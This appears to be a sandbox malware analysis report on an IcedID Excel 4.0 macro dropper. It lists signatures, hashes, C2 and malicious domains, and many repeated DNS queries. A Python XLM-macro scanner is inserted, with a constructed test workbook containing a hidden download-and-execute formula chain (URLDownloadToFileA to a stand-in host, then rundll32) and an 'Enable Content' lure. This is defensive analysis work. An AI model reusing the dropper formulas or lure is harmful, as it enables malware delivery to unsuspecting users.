Analysis Report document-1251000362.xlsm

Overview

General Information

Sample Name: document-1251000362.xlsm
Analysis ID: 382871
MD5: 09217c79f99bbfe977a80d83d62489c7
SHA1: da600d355dfb57190a5745342f3cfeb7d1e509f1
SHA256: 7bf8049e4766a2985851a3d3bf01710c53c389fe1e54397fa332672b62b649d8

Detection

Hidden Macro 4.0 IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormally large hidden Excel 4.0 Macro sheet
Office process drops PE file
Outdated Microsoft Office dropper detected
Performs DNS queries to domains with low reputation
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapter information
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses insecure TLS / SSL version for HTTPS connection

Classification

AV Detection:

Found malware configuration
Source: 3.2.rundll32.exe.190000.0.raw.unpack Malware Configuration Extractor: IcedID {"C2 url": "usaaforced.fun"}
Multi AV Scanner detection for submitted file
Source: document-1251000362.xlsm Metadefender: Detection: 13%
Yara detected IcedID
Source: Yara match File source: 00000003.00000002.2497781112.000000000038E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2174963879.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172023641.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173003375.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2497738687.00000000002E1000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173701556.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172513544.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2796, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2540, type: MEMORY

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 192.185.48.186:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.214.87:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.87.146.86:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.79.62.99:443 -> 192.168.2.22:49170 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 3003[1].gif.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: metaflip.io
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.185.48.186:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.185.48.186:443
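The Excel 4.0 signatures in this report (hidden macro sheet, suspicious formulas, lure text asking the victim to enable content) and the URLDownloadToFileA to rundll32.exe chain evidenced in this section can be checked statically before a sample is detonated. The Python below is an added example and is not part of the sandbox report or its tooling. It treats the .xlsm as a ZIP, resolves which sheets are XLM macro sheets through the workbook relationships (matching the xlMacrosheet relationship type and the xl/macrosheets/ part path is an assumption about how Office stores them), and flags hidden or veryHidden state, sheet size, abused XLM function tokens and lure phrases in the shared strings. The token list, the size threshold, the lure phrases and the minimal workbook produced by build_sample() are constructed for the demonstration; they are not the analysed sample.

```python
"""Static pre-triage of an .xlsm for Excel 4.0 (XLM) macro sheets."""
import html
import io
import json
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
NS_RELS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
NS_R = "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}"

# Assumed: XLM functions commonly abused for download-and-execute and sandbox checks.
SUSPICIOUS_TOKENS = ("EXEC(", "CALL(", "REGISTER(", "URLDOWNLOADTOFILE", "FORMULA(",
                     "FORMULA.FILL(", "RUN(", "GET.WORKSPACE(", "rundll32")
# Assumed lure phrases behind "tries to convince victim to disable security protection".
LURE_PHRASES = ("enable editing", "enable content", "enable macro", "protected view")


def _workbook_rels(zf):
    """Map each r:id in workbook.xml.rels to (relationship type, ZIP part path)."""
    rels = {}
    root = ET.fromstring(zf.read("xl/_rels/workbook.xml.rels"))
    for rel in root.iter(NS_RELS + "Relationship"):
        target = rel.get("Target", "")
        part = target.lstrip("/") if target.startswith("/") else "xl/" + target
        rels[rel.get("Id")] = (rel.get("Type", ""), part)
    return rels


def scan_xlsm(data, large_sheet_cells=500):
    """Return {'macro_sheets': [...], 'lure_text': [...], 'verdict': str} for workbook bytes."""
    report = {"macro_sheets": [], "lure_text": [], "verdict": "clean"}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        rels = _workbook_rels(zf)
        names = set(zf.namelist())
        workbook = ET.fromstring(zf.read("xl/workbook.xml"))
        for sheet in workbook.iter(NS_MAIN + "sheet"):
            rtype, part = rels.get(sheet.get(NS_R + "id"), ("", ""))
            # XLM sheet if the relationship type says so or the part lives under xl/macrosheets/.
            if not (rtype.endswith("/xlMacrosheet") or part.startswith("xl/macrosheets/")):
                continue
            if part not in names:
                continue
            formulas = [f.text or "" for f in ET.fromstring(zf.read(part)).iter(NS_MAIN + "f")]
            hits = sorted({tok for f in formulas for tok in SUSPICIOUS_TOKENS if tok.lower() in f.lower()})
            report["macro_sheets"].append({
                "name": sheet.get("name"),
                "state": sheet.get("state", "visible"),  # visible | hidden | veryHidden
                "formula_cells": len(formulas),
                "suspicious": hits,
            })
        if "xl/sharedStrings.xml" in names:
            strings = ET.fromstring(zf.read("xl/sharedStrings.xml"))
            text = " ".join(t.text or "" for t in strings.iter(NS_MAIN + "t")).lower()
            report["lure_text"] = [p for p in LURE_PHRASES if p in text]
    sheets = report["macro_sheets"]
    if any(s["suspicious"] and (s["state"] != "visible" or s["formula_cells"] >= large_sheet_cells)
           for s in sheets):
        report["verdict"] = "malicious"
    elif sheets or report["lure_text"]:
        report["verdict"] = "suspicious"
    return report


def build_sample(hidden=True, formulas=None):
    """Constructed minimal .xlsm (not the analysed sample): one worksheet plus one XLM macro sheet."""
    if formulas is None:  # download-and-execute chain of the same shape as the dropper above
        formulas = [
            'CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://example.invalid/3003.gif","C:\\Users\\Public\\3003.gif",0,0)',
            'EXEC("rundll32 C:\\Users\\Public\\3003.gif,DllRegisterServer")',
            "HALT()",
        ]
    state = ' state="veryHidden"' if hidden else ""
    workbook = (f'<workbook xmlns="{NS_MAIN[1:-1]}" xmlns:r="{NS_R[1:-1]}"><sheets>'
                '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
                f'<sheet name="Macro1" sheetId="2"{state} r:id="rId2"/></sheets></workbook>')
    rels = (f'<Relationships xmlns="{NS_RELS[1:-1]}">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>'
            '<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.xml"/>'
            '</Relationships>')
    rows = "".join(f'<row r="{i}"><c r="A{i}"><f>{html.escape(formula, quote=False)}</f></c></row>'
                   for i, formula in enumerate(formulas, 1))
    macro = (f'<xm:macrosheet xmlns="{NS_MAIN[1:-1]}" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">'
             f'<sheetData>{rows}</sheetData></xm:macrosheet>')
    shared = (f'<sst xmlns="{NS_MAIN[1:-1]}"><si><t>This document is protected. '
              'Click Enable Editing then Enable Content.</t></si></sst>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/workbook.xml", workbook)
        zf.writestr("xl/_rels/workbook.xml.rels", rels)
        zf.writestr("xl/macrosheets/sheet1.xml", macro)
        zf.writestr("xl/sharedStrings.xml", shared)
    return buf.getvalue()


if __name__ == "__main__":
    print(json.dumps(scan_xlsm(build_sample()), indent=2))
```

A veryHidden sheet cannot be unhidden from the Excel UI at all (only from VBA or by editing the package), which is why the verdict weighs hidden state together with the formula tokens rather than either alone; a large sheet of cell references with no hidden state is how the "abnormally large hidden macro sheet" signature distinguishes obfuscated droppers from legacy business macros.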

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: usaaforced.fun
Outdated Microsoft Office dropper detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE DNS query: agenbolatermurah.com is down
Performs DNS queries to domains with low reputation
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
